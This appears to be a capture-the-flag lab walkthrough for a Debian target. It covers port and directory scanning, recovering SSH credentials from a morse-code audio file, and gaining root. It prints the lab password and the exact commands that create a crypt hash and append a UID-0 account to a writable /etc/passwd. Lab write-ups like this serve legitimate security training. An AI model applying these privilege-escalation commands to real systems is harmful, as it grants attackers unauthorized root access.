Machine IP →
Nmap scan →
nmap -A -Pn -p- -T4 -o nmap.txt 192.168.72.73
OS Detection →
OS: Linux; CPE: cpe:/o:linux:linux_kernel
|Port||Service||Other details (if any)|
|22||SSH||OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)|
|80||HTTP||Apache httpd 2.4.38 ((Debian))|
GoBuster scan →
gobuster dir -u http://192.168.72.73 -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt
Directories/files listed →
- img/ (301)
- image/ (301)
- admin/ (301)
- manual/ (301)
- server-status (403)
- bulma/ (301)
The robots.txt was checked manually during the scan was running. Robots file reveals a directory called
find_me. This doesn’t contain any useful information either.
None of the directories were really useful. The login pages inside the
/admin/ directory were empty. The
/bulma/ directory revealed an audio file in the wav format.
Uploading the wav file to an online audio decoder shows that the audio is morse code and the text states the presence of a user
trunks with a password
u$3r. This can be used to login to the ssh server running at the target. This gives us the user flag.
sudo and setuid binaries on the file system, there was no finding apart from the presence of the setuid binary
su. Looked at the bash rc and history files. The history file contained the following interesting entries →
1 2 perl -le 'print crypt("Password@973","addedsalt")' echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
Checked the permissions of the
/etc/passwd file and indeed the user
Trunks owned the file. This allowed direct manipulation of the file. Therefore, added the above entry to the passwd file. Then logged in as Tom using the password that was encrypted in the above commands.
This gave the root shell and thereby the root flag.